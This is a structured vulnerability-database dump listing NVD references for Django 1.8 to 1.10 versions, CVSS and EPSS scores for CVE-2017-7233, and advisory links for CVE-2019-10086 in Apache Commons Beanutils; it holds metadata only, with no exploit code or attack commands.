reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:djangoproject:django:1.10.0:b1:*:*:*:*:*:*
reference_id cpe:2.3:a:djangoproject:django:1.10.0:b1:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:djangoproject:django:1.10.0:b1:*:*:*:*:*:*
32
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:djangoproject:django:1.10.0:rc1:*:*:*:*:*:*
reference_id cpe:2.3:a:djangoproject:django:1.10.0:rc1:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:djangoproject:django:1.10.0:rc1:*:*:*:*:*:*
33
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:djangoproject:django:1.10.1:*:*:*:*:*:*:*
reference_id cpe:2.3:a:djangoproject:django:1.10.1:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:djangoproject:django:1.10.1:*:*:*:*:*:*:*
34
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:djangoproject:django:1.10.2:*:*:*:*:*:*:*
reference_id cpe:2.3:a:djangoproject:django:1.10.2:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:djangoproject:django:1.10.2:*:*:*:*:*:*:*
35
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:djangoproject:django:1.10.3:*:*:*:*:*:*:*
reference_id cpe:2.3:a:djangoproject:django:1.10.3:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:djangoproject:django:1.10.3:*:*:*:*:*:*:*
36
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:djangoproject:django:1.10.4:*:*:*:*:*:*:*
reference_id cpe:2.3:a:djangoproject:django:1.10.4:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:djangoproject:django:1.10.4:*:*:*:*:*:*:*
37
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:djangoproject:django:1.10.5:*:*:*:*:*:*:*
reference_id cpe:2.3:a:djangoproject:django:1.10.5:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:djangoproject:django:1.10.5:*:*:*:*:*:*:*
38
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:djangoproject:django:1.10.6:*:*:*:*:*:*:*
reference_id cpe:2.3:a:djangoproject:django:1.10.6:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:djangoproject:django:1.10.6:*:*:*:*:*:*:*
39
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:djangoproject:django:1.8.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:djangoproject:django:1.8.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:djangoproject:django:1.8.0:*:*:*:*:*:*:*
40
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:djangoproject:django:1.8.0:a1:*:*:*:*:*:*
reference_id cpe:2.3:a:djangoproject:django:1.8.0:a1:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:djangoproject:django:1.8.0:a1:*:*:*:*:*:*
41
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:djangoproject:django:1.8.0:b1:*:*:*:*:*:*
reference_id cpe:2.3:a:djangoproject:django:1.8.0:b1:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:djangoproject:django:1.8.0:b1:*:*:*:*:*:*
42
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:djangoproject:django:1.8.0:b2:*:*:*:*:*:*
reference_id cpe:2.3:a:djangoproject:django:1.8.0:b2:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:djangoproject:django:1.8.0:b2:*:*:*:*:*:*
43
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:djangoproject:django:1.8.0:c1:*:*:*:*:*:*
reference_id cpe:2.3:a:djangoproject:django:1.8.0:c1:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:djangoproject:django:1.8.0:c1:*:*:*:*:*:*
44
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:djangoproject:django:1.8.1:*:*:*:*:*:*:*
reference_id cpe:2.3:a:djangoproject:django:1.8.1:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:djangoproject:django:1.8.1:*:*:*:*:*:*:*
45
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:djangoproject:django:1.8.10:*:*:*:*:*:*:*
reference_id cpe:2.3:a:djangoproject:django:1.8.10:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:djangoproject:django:1.8.10:*:*:*:*:*:*:*
46
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:djangoproject:django:1.8.11:*:*:*:*:*:*:*
reference_id cpe:2.3:a:djangoproject:django:1.8.11:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:djangoproject:django:1.8.11:*:*:*:*:*:*:*
47
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:djangoproject:django:1.8.12:*:*:*:*:*:*:*
reference_id cpe:2.3:a:djangoproject:django:1.8.12:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:djangoproject:django:1.8.12:*:*:*:*:*:*:*
48
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:djangoproject:django:1.8.13:*:*:*:*:*:*:*
reference_id cpe:2.3:a:djangoproject:django:1.8.13:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:djangoproject:django:1.8.13:*:*:*:*:*:*:*
49
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:djangoproject:django:1.8.14:*:*:*:*:*:*:*
reference_id cpe:2.3:a:djangoproject:django:1.8.14:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:djangoproject:django:1.8.14:*:*:*:*:*:*:*
50
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:djangoproject:django:1.8.15:*:*:*:*:*:*:*
reference_id cpe:2.3:a:djangoproject:django:1.8.15:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:djangoproject:django:1.8.15:*:*:*:*:*:*:*
51
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:djangoproject:django:1.8.16:*:*:*:*:*:*:*
reference_id cpe:2.3:a:djangoproject:django:1.8.16:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:djangoproject:django:1.8.16:*:*:*:*:*:*:*
52
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:djangoproject:django:1.8.17:*:*:*:*:*:*:*
reference_id cpe:2.3:a:djangoproject:django:1.8.17:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:djangoproject:django:1.8.17:*:*:*:*:*:*:*
53
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:djangoproject:django:1.8.2:*:*:*:*:*:*:*
reference_id cpe:2.3:a:djangoproject:django:1.8.2:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:djangoproject:django:1.8.2:*:*:*:*:*:*:*
54
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:djangoproject:django:1.8.3:*:*:*:*:*:*:*
reference_id cpe:2.3:a:djangoproject:django:1.8.3:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:djangoproject:django:1.8.3:*:*:*:*:*:*:*
55
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:djangoproject:django:1.8.4:*:*:*:*:*:*:*
reference_id cpe:2.3:a:djangoproject:django:1.8.4:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:djangoproject:django:1.8.4:*:*:*:*:*:*:*
56
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:djangoproject:django:1.8.5:*:*:*:*:*:*:*
reference_id cpe:2.3:a:djangoproject:django:1.8.5:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:djangoproject:django:1.8.5:*:*:*:*:*:*:*
57
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:djangoproject:django:1.8.6:*:*:*:*:*:*:*
reference_id cpe:2.3:a:djangoproject:django:1.8.6:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:djangoproject:django:1.8.6:*:*:*:*:*:*:*
58
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:djangoproject:django:1.8.7:*:*:*:*:*:*:*
reference_id cpe:2.3:a:djangoproject:django:1.8.7:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:djangoproject:django:1.8.7:*:*:*:*:*:*:*
59
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:djangoproject:django:1.8.8:*:*:*:*:*:*:*
reference_id cpe:2.3:a:djangoproject:django:1.8.8:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:djangoproject:django:1.8.8:*:*:*:*:*:*:*
60
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:djangoproject:django:1.8.9:*:*:*:*:*:*:*
reference_id cpe:2.3:a:djangoproject:django:1.8.9:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:djangoproject:django:1.8.9:*:*:*:*:*:*:*
61
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:djangoproject:django:1.9:*:*:*:*:*:*:*
reference_id cpe:2.3:a:djangoproject:django:1.9:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:djangoproject:django:1.9:*:*:*:*:*:*:*
62
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:djangoproject:django:1.9.1:*:*:*:*:*:*:*
reference_id cpe:2.3:a:djangoproject:django:1.9.1:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:djangoproject:django:1.9.1:*:*:*:*:*:*:*
63
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:djangoproject:django:1.9.10:*:*:*:*:*:*:*
reference_id cpe:2.3:a:djangoproject:django:1.9.10:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:djangoproject:django:1.9.10:*:*:*:*:*:*:*
64
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:djangoproject:django:1.9.11:*:*:*:*:*:*:*
reference_id cpe:2.3:a:djangoproject:django:1.9.11:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:djangoproject:django:1.9.11:*:*:*:*:*:*:*
65
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:djangoproject:django:1.9.12:*:*:*:*:*:*:*
reference_id cpe:2.3:a:djangoproject:django:1.9.12:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:djangoproject:django:1.9.12:*:*:*:*:*:*:*
66
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:djangoproject:django:1.9.2:*:*:*:*:*:*:*
reference_id cpe:2.3:a:djangoproject:django:1.9.2:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:djangoproject:django:1.9.2:*:*:*:*:*:*:*
67
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:djangoproject:django:1.9.3:*:*:*:*:*:*:*
reference_id cpe:2.3:a:djangoproject:django:1.9.3:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:djangoproject:django:1.9.3:*:*:*:*:*:*:*
68
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:djangoproject:django:1.9.4:*:*:*:*:*:*:*
reference_id cpe:2.3:a:djangoproject:django:1.9.4:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:djangoproject:django:1.9.4:*:*:*:*:*:*:*
69
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:djangoproject:django:1.9.5:*:*:*:*:*:*:*
reference_id cpe:2.3:a:djangoproject:django:1.9.5:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:djangoproject:django:1.9.5:*:*:*:*:*:*:*
70
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:djangoproject:django:1.9.6:*:*:*:*:*:*:*
reference_id cpe:2.3:a:djangoproject:django:1.9.6:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:djangoproject:django:1.9.6:*:*:*:*:*:*:*
71
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:djangoproject:django:1.9.7:*:*:*:*:*:*:*
reference_id cpe:2.3:a:djangoproject:django:1.9.7:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:djangoproject:django:1.9.7:*:*:*:*:*:*:*
72
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:djangoproject:django:1.9.8:*:*:*:*:*:*:*
reference_id cpe:2.3:a:djangoproject:django:1.9.8:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:djangoproject:django:1.9.8:*:*:*:*:*:*:*
73
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:djangoproject:django:1.9.9:*:*:*:*:*:*:*
reference_id cpe:2.3:a:djangoproject:django:1.9.9:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:djangoproject:django:1.9.9:*:*:*:*:*:*:*
74
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:djangoproject:django:1.9:a1:*:*:*:*:*:*
reference_id cpe:2.3:a:djangoproject:django:1.9:a1:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:djangoproject:django:1.9:a1:*:*:*:*:*:*
75
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:djangoproject:django:1.9:b1:*:*:*:*:*:*
reference_id cpe:2.3:a:djangoproject:django:1.9:b1:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:djangoproject:django:1.9:b1:*:*:*:*:*:*
76
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:djangoproject:django:1.9:rc1:*:*:*:*:*:*
reference_id cpe:2.3:a:djangoproject:django:1.9:rc1:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:djangoproject:django:1.9:rc1:*:*:*:*:*:*
77
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:djangoproject:django:1.9:rc2:*:*:*:*:*:*
reference_id cpe:2.3:a:djangoproject:django:1.9:rc2:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:djangoproject:django:1.9:rc2:*:*:*:*:*:*
78
reference_url https://nvd.nist.gov/vuln/detail/CVE-2017-7233
reference_id CVE-2017-7233
reference_type
scores
0
value 5.8
scoring_system cvssv2
scoring_elements AV:N/AC:M/Au:N/C:P/I:P/A:N
1
value 6.1
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
3
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N
4
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2017-7233
79
reference_url https://usn.ubuntu.com/3254-1/
reference_id USN-3254-1
reference_type
scores
url https://usn.ubuntu.com/3254-1/
fixed_packages
aliases CVE-2017-7233, GHSA-37hp-765x-j95x, PYSEC-2017-9
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-bdms-nb18-guf9
29
url VCID-bhq3-j6aj-1yae
vulnerability_id VCID-bhq3-j6aj-1yae
summary 
Insecure Deserialization in Apache Commons Beanutils
In Apache Commons Beanutils 1.9.2, a special BeanIntrospector class was added which allows suppressing the ability for an attacker to access the classloader via the class property available on all Java objects. We, however were not using this by default characteristic of the PropertyUtilsBean.
references
0
reference_url http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00007.html
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00007.html
1
reference_url http://mail-archives.apache.org/mod_mbox/www-announce/201908.mbox/%3cC628798F-315D-4428-8CB1-4ED1ECC958E4%40apache.org%3e
reference_id
reference_type
scores
url http://mail-archives.apache.org/mod_mbox/www-announce/201908.mbox/%3cC628798F-315D-4428-8CB1-4ED1ECC958E4%40apache.org%3e
2
reference_url http://mail-archives.apache.org/mod_mbox/www-announce/201908.mbox/%3cC628798F-315D-4428-8CB1-4ED1ECC958E4@apache.org%3e
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url http://mail-archives.apache.org/mod_mbox/www-announce/201908.mbox/%3cC628798F-315D-4428-8CB1-4ED1ECC958E4@apache.org%3e
3
reference_url https://access.redhat.com/errata/RHSA-2019:4317
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2019:4317
4
reference_url https://access.redhat.com/errata/RHSA-2020:0057
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2020:0057
5
reference_url https://access.redhat.com/errata/RHSA-2020:0194
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2020:0194
6
reference_url https://access.redhat.com/errata/RHSA-2020:0804
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2020:0804
7
reference_url https://access.redhat.com/errata/RHSA-2020:0805
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2020:0805
8
reference_url https://access.redhat.com/errata/RHSA-2020:0806
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2020:0806
9
reference_url https://access.redhat.com/errata/RHSA-2020:0811
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2020:0811
10
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-10086.json
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-10086.json
11
reference_url https://api.first.org/data/v1/epss?cve=CVE-2019-10086
reference_id
reference_type
scores
0
value 0.01239
scoring_system epss
scoring_elements 0.79214
published_at 2026-04-04T12:55:00Z
1
value 0.01239
scoring_system epss
scoring_elements 0.79199
published_at 2026-04-07T12:55:00Z
2
value 0.01239
scoring_system epss
scoring_elements 0.79241
published_at 2026-04-12T12:55:00Z
3
value 0.01239
scoring_system epss
scoring_elements 0.79225
published_at 2026-04-08T12:55:00Z
4
value 0.01239
scoring_system epss
scoring_elements 0.79184
published_at 2026-04-01T12:55:00Z
5
value 0.01239
scoring_system epss
scoring_elements 0.79232
published_at 2026-04-09T12:55:00Z
6
value 0.01239
scoring_system epss
scoring_elements 0.79256
published_at 2026-04-11T12:55:00Z
7
value 0.01239
scoring_system epss
scoring_elements 0.7919
published_at 2026-04-02T12:55:00Z
8
value 0.01239
scoring_system epss
scoring_elements 0.79229
published_at 2026-04-13T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2019-10086
12
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10086
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10086
13
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
14
reference_url https://github.com/apache/commons-beanutils
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/apache/commons-beanutils
15
reference_url https://lists.apache.org/thread.html/02094ad226dbc17a2368beaf27e61d8b1432f5baf77d0ca995bb78bc@%3Cissues.commons.apache.org%3E
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/02094ad226dbc17a2368beaf27e61d8b1432f5baf77d0ca995bb78bc@%3Cissues.commons.apache.org%3E
16
reference_url https://lists.apache.org/thread.html/02094ad226dbc17a2368beaf27e61d8b1432f5baf77d0ca995bb78bc%40%3Cissues.commons.apache.org%3E
reference_id
reference_type
scores
url https://lists.apache.org/thread.html/02094ad226dbc17a2368beaf27e61d8b1432f5baf77d0ca995bb78bc%40%3Cissues.commons.apache.org%3E
17
reference_url https://lists.apache.org/thread.html/1f78f1e32cc5614ec0c5b822ba4bd7fc8e8b5c46c8e038b6bd609cb5@%3Cissues.commons.apache.org%3E
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/1f78f1e32cc5614ec0c5b822ba4bd7fc8e8b5c46c8e038b6bd609cb5@%3Cissues.commons.apache.org%3E
18
reference_url https://lists.apache.org/thread.html/1f78f1e32cc5614ec0c5b822ba4bd7fc8e8b5c46c8e038b6bd609cb5%40%3Cissues.commons.apache.org%3E
reference_id
reference_type
scores
url https://lists.apache.org/thread.html/1f78f1e32cc5614ec0c5b822ba4bd7fc8e8b5c46c8e038b6bd609cb5%40%3Cissues.commons.apache.org%3E
19
reference_url https://lists.apache.org/thread.html/2fd61dc89df9aeab738d2b49f48d42c76f7d53b980ba04e1d48bce48@%3Cdev.shiro.apache.org%3E
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/2fd61dc89df9aeab738d2b49f48d42c76f7d53b980ba04e1d48bce48@%3Cdev.shiro.apache.org%3E
20
reference_url https://lists.apache.org/thread.html/2fd61dc89df9aeab738d2b49f48d42c76f7d53b980ba04e1d48bce48%40%3Cdev.shiro.apache.org%3E
reference_id
reference_type
scores
